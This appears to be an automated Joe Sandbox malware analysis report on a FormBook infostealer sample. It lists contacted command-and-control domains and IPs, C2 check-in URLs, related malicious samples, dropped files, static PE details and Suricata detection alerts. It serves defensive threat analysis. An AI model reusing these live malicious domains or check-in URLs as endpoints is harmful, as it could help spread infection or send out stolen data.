                                            		unknown
                                            http://www.graviton.energy/css/app.cssfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.graviton.energy/images/favicons/favicon.icofinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.e8af.xyzRAdsmABlJtKpzt.exe, 0000000C.00000002.3140404421.0000000002EB4000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&amp;rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7mfinger.exe, 0000000B.00000002.3141353957.00000000049E4000.00000004.10000000.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004484000.00000004.00000001.00040000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://www.ecosia.org/newtab/finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.graviton.energy/../images/bg-landing-page.jpgfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdffinger.exe, 0000000B.00000002.3141353957.00000000046C0000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000004160000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://www.graviton.energy/images/favicons/safari-pinned-tab.svgfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://use.typekit.net/bag0psx.cssfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://www.hosttech.chRAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfinger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.graviton.energy/images/favicons/favicon-16x16.pngfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.graviton.energy/images/favicons/apple-touch-icon.pngfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=finger.exe, 0000000B.00000002.3143595877.0000000007CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://00808.vip/finger.exe, 0000000B.00000002.3141353957.000000000439C000.00000004.10000000.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.0000000003E3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.graviton.energy/js/app.jsfinger.exe, 0000000B.00000002.3141353957.0000000004852000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 0000000B.00000002.3143403804.0000000006120000.00000004.00000800.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3141015198.00000000042F2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            209.74.79.42
                                                            		www.primespot.liveUnited States
                                                            		31744MULTIBAND-NEWHOPEUStrue
                                                            134.122.191.187
                                                            		www.smalleyes.icuUnited States
                                                            		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                            3.252.97.86
                                                            		www.e8af.xyzUnited States
                                                            		16509AMAZON-02UStrue
                                                            104.21.48.233
                                                            		www.ausyva4.topUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            156.234.28.101
                                                            		www.btblxhh.topSeychelles
                                                            		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                            208.91.197.27
                                                            		www.mohawktooldie.onlineVirgin Islands (BRITISH)
                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                            104.21.86.111
                                                            		www.pbfgm.xyzUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            185.101.158.113
                                                            		www.graviton.energySwitzerland
                                                            		207143HOSTTECH-ASCHtrue
                                                            194.58.112.174
                                                            		www.elinor.clubRussian Federation
                                                            		197695AS-REGRUfalse

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1588797
                                                            Start date and time:2025-01-11 05:41:27 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 10s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Run name:Run with higher sleep bypass
                                                            Number of analysed new started processes analysed:16
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:wSoShbuXnJ.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@10/9
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 83
                                                            • Number of non-executed functions: 282
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 4.175.87.197, 52.149.20.212
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            No simulations

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            209.74.79.42ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                            • www.creaturpace.xyz/iqne/
                                                            hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                            • www.glowups.life/dheh/?IJQ=6JcMAOZ0kkEuPLPrHoW/FblxSw+tVU6K5Nqk+SkmZf4Wc9f19ayTyDmVFSf9h78jkWY5XnirO34u2f/fghaoXyr8Ye4/fwyHnaYezOVMQq/814mWJNreSyQ=&GF=mlOXG
                                                            J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                            • www.valuault.store/nhb9/
                                                            NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                            • www.valuault.store/nhb9/
                                                            zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                            • www.glowups.life/o8f4/
                                                            SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • www.primespot.live/icu6/
                                                            Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                            • www.glowups.life/dheh/
                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • www.primespot.live/b8eq/
                                                            134.122.191.187SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                            • www.smalleyes.icu/s6zh/
                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • www.smalleyes.icu/s6zh/
                                                            104.21.48.233AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                            • www.ausyva4.top/al74/
                                                            3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                            • www.ausyva4.top/al74/
                                                            DHL.exeGet hashmaliciousFormBookBrowse
                                                            • www.ausyva4.top/al74/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.elinor.club5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • 194.58.112.174
                                                            Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 194.58.112.174
                                                            www.smalleyes.icuSWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                            • 134.122.191.187
                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • 134.122.191.187
                                                            www.primespot.liveSHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            www.graviton.energy72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • 185.101.158.113
                                                            www.ausyva4.topAuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.48.233
                                                            3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.48.233
                                                            DHL.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.48.233
                                                            www.btblxhh.top72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • 156.234.28.101
                                                            www.pbfgm.xyzSWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.86.111
                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.218.146
                                                            www.mohawktooldie.online72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                            • 208.91.197.27

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            BCPL-SGBGPNETGlobalASNSG02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 27.124.4.246
                                                            AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                            • 27.124.4.246
                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                            • 134.122.133.80
                                                            tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                            • 27.124.4.246
                                                            M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                            • 202.79.161.151
                                                            9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                            • 134.122.133.80
                                                            NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                            • 134.122.133.80
                                                            xsYbMYg5Dr.exeGet hashmaliciousUnknownBrowse
                                                            • 137.220.229.26
                                                            https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                            • 134.122.133.80
                                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                            • 202.95.11.110
                                                            CLOUDFLARENETUS1507513743282749438.jsGet hashmaliciousStrela DownloaderBrowse
                                                            • 162.159.61.3
                                                            rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 104.21.48.1
                                                            C6Abn5cBei.exeGet hashmaliciousFormBookBrowse
                                                            • 172.67.145.234
                                                            wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.80.1
                                                            prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 104.21.48.1
                                                            ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.15.100
                                                            ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.48.1
                                                            leUmNO9XPu.exeGet hashmaliciousHawkEye, MailPassViewBrowse
                                                            • 104.19.223.79
                                                            dZMT94YYwO.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 104.21.16.1
                                                            ZeAX5i7cGB.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.26.13.205
                                                            MULTIBAND-NEWHOPEUSBLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.40
                                                            SLq0ulC3Wf.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.40
                                                            ZcshRk2lgh.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 209.74.77.109
                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.41
                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.41
                                                            BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            AMAZON-02USBLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            4.elfGet hashmaliciousUnknownBrowse
                                                            • 18.131.143.241
                                                            ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            PGK60fNNCZ.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 76.223.54.146
                                                            zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                            • 18.141.10.107
                                                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wSoShbuXnJ.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\wSoShbuXnJ.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Temp\40F193-3PQ

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\finger.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1211596417522893
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                            MD5:0AB67F0950F46216D5590A6A41A267C7
                                                            SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                            SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                            SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.729588487053115
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:wSoShbuXnJ.exe
                                                            File size:834'560 bytes
                                                            MD5:feea3eb7d321ac0ff06d81683ac140ed
                                                            SHA1:9a18261e4703b51dec32610dd0c822de8ba2d752
                                                            SHA256:9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5
                                                            SHA512:61da59961d4acafdd1b5de376dc35485966fb25bc13c6fa43f161b5a775d4c8161b3d933da2f05405a9b0af49398ccd8ebcf38bbe119c9d5082358ea890b75e0
                                                            SSDEEP:12288:GhXR9b4YbiwyFhGltSNXn5Foh1L2D6bNzPRrSRKrsmmPEojzOIYfn4:GhX/WOSp5Oh1UuNDcSUEm7q
                                                            TLSH:8E0502741A49C902C86D6B740972F2BE1BB88FDBF402E71B5FCA6DFB7D11A4648644C2
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.kg..............0.................. ........@.. ....................... ............@................................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4cd006
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x676B9433 [Wed Dec 25 05:12:19 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            push ebx
                                                            add byte ptr [ecx+00h], bh
                                                            jnc 00007F73807ECEE2h
                                                            je 00007F73807ECEE2h
                                                            add byte ptr [ebp+00h], ch
                                                            add byte ptr [edx+00h], dl
                                                            add byte ptr [esi+00h], ah
                                                            insb
                                                            add byte ptr [ebp+00h], ah
                                                            arpl word ptr [eax], ax
                                                            je 00007F73807ECEE2h
                                                            imul eax, dword ptr [eax], 006E006Fh
                                                            add byte ptr [ecx+00h], al
                                                            jnc 00007F73807ECEE2h
                                                            jnc 00007F73807ECEE2h
                                                            add byte ptr [ebp+00h], ch
                                                            bound eax, dword ptr [eax]
                                                            insb
                                                            add byte ptr [ecx+00h], bh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            dec esp
                                                            add byte ptr [edi+00h], ch
                                                            popad
                                                            add byte ptr [eax+eax+00h], ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xccfb40x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000x51c.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xcb04c0xcb20003b91143da00255a61cb598997b1f7faFalse0.8937704326923077data7.737457250389855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xce0000x51c0x600a5c0005ae57a3ddddc848c276b1e0707False0.3580729166666667data2.929288226801208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xd00000xc0x200801d563e39ec8efa5545ec53e57d0fe0False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0xce0580x4c0data0.42269736842105265

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2025-01-11T05:43:26.279884+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049980104.21.86.11180TCP
                                                            2025-01-11T05:43:26.279884+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049980104.21.86.11180TCP
                                                            2025-01-11T05:43:50.308035+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049982194.58.112.17480TCP
                                                            2025-01-11T05:43:52.866259+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049983194.58.112.17480TCP
                                                            2025-01-11T05:43:55.424624+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049984194.58.112.17480TCP
                                                            2025-01-11T05:43:57.983996+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049985194.58.112.17480TCP
